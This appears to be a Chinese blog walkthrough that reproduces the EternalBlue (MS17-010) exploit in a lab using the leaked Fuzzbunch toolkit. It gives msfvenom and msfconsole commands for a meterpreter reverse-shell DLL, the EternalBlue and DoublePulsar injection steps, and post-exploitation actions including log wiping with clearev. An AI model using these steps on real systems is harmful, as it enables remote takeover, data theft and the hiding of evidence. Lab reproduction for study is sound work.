linux运行fuzzbunch,[原创]漏洞之永恒之蓝(简单复现)

漏洞分析之永恒之蓝(ms17-010)

目录

☛ 1.漏洞介绍

1.漏洞描述

Eternalblue通过 TCP 端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的windows机器,无需用户任何操作,只要开机上网,就能在电脑中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序

2.漏洞影响

目前已知受影响的windows版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

☛ 2.漏洞复现

1.环境搭建

控制机(Kali-Linux64 IP:192.168.43.89):使用msf生成攻击负载

攻击机(windows7(32) IP:192.168.43.198):运行攻击程序,注入dll等;EternalBlue需要python2.6.6,32位;以及pywin32-211,32位

2.windows7(32)攻击机工具安装及配置

Python2.6 工具直接安装即可;Pywin32的安装需要以管理员权限执行;Shadowbrokers-master直接解压到指定目录,同时修改FuzzyBunch.xml文件内容,设置相应的ResourceDir和LogDir参数值,修改结果如下图所示:

fe787a62ed280af3ec52475555eabf85.png

3.Kali下生成木马程序

Kali下生成木马程序使用到metasploit-framework中的msfvenom,具体参数可参考文档:https://www.freebuf.com/sectool/72135.html;这里我们使用到 -p 和 -f 两个参数,分别表示载荷和格式,具体命令为:/> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.89 LPORT=5555 -f dll > systemSet.dll

33b338f32cdbed43e97f09448a0165ab.png

说明:-p 指定攻击载荷,LHOST指定监听地址,LPORT指定监听端口,-f 指定木马程序格式为dll,> 指定生成木马程序的保存路径,systemSet.dll表示木马程序保存在当前目录下,我们可以通过ls查看

4.使用Kali开启msfpayload监听

1.开启msfconsole

/> cd /usr/share/metasploit-framework

/> msfconsole

6841dfeae2df6894c4713e8ccb5819e1.png

2.设置开启监听

/> use exploit/multi/handler

/> set payload windows/x64/meterpreter/reverse_tcp

/> set LHOST 192.168.43.89

/> set LPORT 5555

/> exploit

165be172fffeadb46500b47797bf76d2.png

5.Fuzzbunch基本配置

1.生成后,将dll文件拷贝到攻击机C盘的根目录下,运行windows中的fb.py,并将其中的第72行注释掉;利用 EternalBlue 攻击受害系统,成功后使用 Doublepulsa 将刚刚生成的木马,远程注入受害系统中,从控制机上控制受害机;在使用 Fuzzbunch 时需要做些配置,如以下示图:(除特殊说明外,其它配置保持默认即可)

2.需要设置的有攻击IP地址:192.168.43.28(受害机), 回调地址192.168.43.198(攻击机),关闭重定向,设置日志路径,新建或选择一个project其他默认即可

5aef6f535954a859e46f2a158e70a49d.png

3.输入命令开启永恒之蓝开始攻击use ETERNALBLUE

98bd6d7f23d85d17309f77d449a70306.png

依次填入相关参数,超时时间等默认参数可直接回车,需要注意的就是选择被攻击方的操作系统目标系统信息。以及攻击模式选择FB

a5f211de18af7ae47f1b558a6c55deb6.png

4.运行插件,看到 Eternalblue Succeeded 攻击成功

72fd5f3975fa63850b6994b65b9d90df.png

5.使用 Doublepulsar,把刚刚生成的木马注入到受害系统中use Doublepulasr;一路回车,需要注意的是选择目标操作系统架构,系统后门的执行方式选择 Rundll

1223879b594371855d52fd1d7ec21bd4.png

填写刚刚生成木马文件的路径

d99c999a6bd403cbe40ff8319cfdaed8.png

Doublepulsar Succeeded ,已经成功把dll木马注入到受操控的系统中。攻击机的使命到此结束

b200da325a05b13ada3bb04ccad5d38b.png

6.返回到控制机,已链接

☛ 3.漏洞利用

1.sysinfo查看靶机的基本信息

0b1e66bc885049abcdf9761d504ed177.png

2.screenshot截取被控制端电脑的屏幕看看

1a0137bb4467f8a63955566acd347e53.png

3.shell获取被控制系统的shell,就是像在你电脑上运行cmd一样,任何命令都可以执行,最高权限,被控制端上没有任何的提示。可以cmd rar 把被控制端上看着有用的文件给加密压缩……能做到很多,上传,下载文件,执行文件

37409f7f86804b853a0b465b2ef9733a.png

4.clearev清理掉痕迹,清理被控制端的日志

☛ 4.总结“永恒之蓝”会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值